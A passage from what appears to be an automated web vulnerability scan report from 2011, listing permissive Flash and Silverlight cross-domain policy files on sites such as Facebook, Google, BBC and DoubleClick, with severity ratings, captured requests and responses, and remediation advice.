Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=114
Expires: Sat, 14 May 2011 14:03:50 GMT
Date: Sat, 14 May 2011 14:01:56 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

7.46. http://pagead2.googlesyndication.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sat, 14 May 2011 10:49:15 GMT
Expires: Sun, 15 May 2011 10:49:15 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 26108
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

7.47. http://server.iad.liveperson.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: server.iad.liveperson.net

Response

HTTP/1.1 200 OK
Content-Length: 526
Content-Type: text/xml
Content-Location: http://server.iad.liveperson.net/crossdomain.xml
Last-Modified: Thu, 23 Oct 2008 22:13:48 GMT
Accept-Ranges: bytes
ETag: "076249f5c35c91:11c4"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 14:13:26 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false" />
...[SNIP]...
<allow-access-from domain="secure.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.qa.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.st.neogames-tech.com" secure="false"/>
...[SNIP]...

7.48. http://static.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.138.64.186
Date: Sat, 14 May 2011 18:37:53 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

7.49. http://www.adobe.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adobe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adobe.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 12 Jan 2011 18:55:31 GMT
ETag: "144-bec64ec0"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Sat, 14 May 2011 02:59:37 GMT
Keep-Alive: timeout=5, max=498
Content-Type: text/x-cross-domain-policy
Connection: close
Date: Sat, 14 May 2011 14:13:42 GMT
Age: 473
Content-Length: 324

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="by-content-type"/>
   <allow-access-from domain="*.macromedia.com" />
   <allow-access-from domain="*.adobe.com" />
   <allow-access-from domain="*.photoshop.com" />
   <allow-access-from domain="*.acrobat.com" />
...[SNIP]...

7.50. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.32.227.104
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

7.51. https://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.235.51
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

7.52. http://www.sapient.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sapient.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sapient.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 588
Content-Type: text/xml
Last-Modified: Thu, 23 Apr 2009 19:45:38 GMT
Accept-Ranges: bytes
ETag: "5321c4134cc4c91:2101"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 13:58:28 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"[]>
<cross-domain-policy>
<allow-access-from domain="*.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sapientem.com" secure="false" />
...[SNIP]...
<allow-access-from domain="sapient.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="edge.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="edge-dev.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="localhost" secure="false" />
...[SNIP]...

7.53. http://api.twitter.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 22:34:20 GMT
Server: hi
Status: 200 OK
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sat, 14 May 2011 23:04:20 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

7.54. http://bloxcms.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bloxcms.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bloxcms.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2074952
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:30:00 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0626
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
X-Cache-Info: caching
Real-Hostname: bloxcms.com
X-TNCMS-Served-By: cmsapp1
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
               "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.chicago2.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...

7.55. http://services.google.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://services.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: services.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 29 Jan 2010 01:57:02 GMT
Date: Sat, 14 May 2011 14:13:27 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="static.googleusercontent.com" />
<allow-access-from domain="74.125.127.100" />
<allow-access-from domain="74.125.77.132" />
<allow-access-from domain="209.85.129.132" />
<allow-access-from domain="216.239.59.132" />
<allow-access-from domain="74.125.95.132" />
<allow-access-from domain="72.14.213.132" />
<allow-access-from domain="72.14.203.132" />
<allow-access-from domain="74.125.153.132" />
<allow-access-from domain="74.125.113.132" />
<allow-access-from domain="74.125.47.132" />
...[SNIP]...

7.56. http://stats.wordpress.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.wordpress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 May 2011 18:06:14 GMT
Content-Type: text/xml
Connection: close
Content-Length: 585
Last-Modified: Fri, 24 Sep 2010 20:06:27 GMT
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only" /><allow-access-from domain="v.wordpress.com" to-ports="80,443" /><allow-access-from domain="v0.wordpress.com" to-ports="80,443" secure="false" /><allow-access-from domain="videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="s0.videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="realeyes.com" to-ports="80,443" />
...[SNIP]...

7.57. https://townnews365-dot-com.bloxcms.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://townnews365-dot-com.bloxcms.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: townnews365-dot-com.bloxcms.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2082872
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:33:05 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0444
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
X-Cache-Info: caching
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp6
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
               "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.chicago2.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...

7.58. http://twitter.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:13:38 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1305382418687361; path=/; expires=Sat, 21-May-11 14:13:38 GMT; domain=.twitter.com
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sat, 14 May 2011 14:43:38 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
   <allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

7.59. http://www.stowetoday.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stowetoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stowetoday.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2082628
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:28:57 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0319
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
X-Cache-Info: caching
Real-Hostname: stowetoday.com
X-TNCMS-Served-By: cmsapp12
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
               "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.chicago2.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...

7.60. http://www.townnews365.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.townnews365.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.townnews365.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2080720
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:30:00 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0536
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
X-Cache-Info: caching
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp2
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
               "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.chicago2.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...

8. Silverlight cross-domain policy  previous  next
There are 8 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


8.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Sat, 14 May 2011 14:23:44 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8.2. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Sun, 15 May 2011 18:10:09 GMT
Date: Sat, 14 May 2011 18:10:09 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

8.3. http://metrics.blackberry.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.blackberry.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.blackberry.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:23:37 GMT
Server: Omniture DC/2.0.0
xserver: www312
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

8.4. http://omni.accenture.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omni.accenture.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

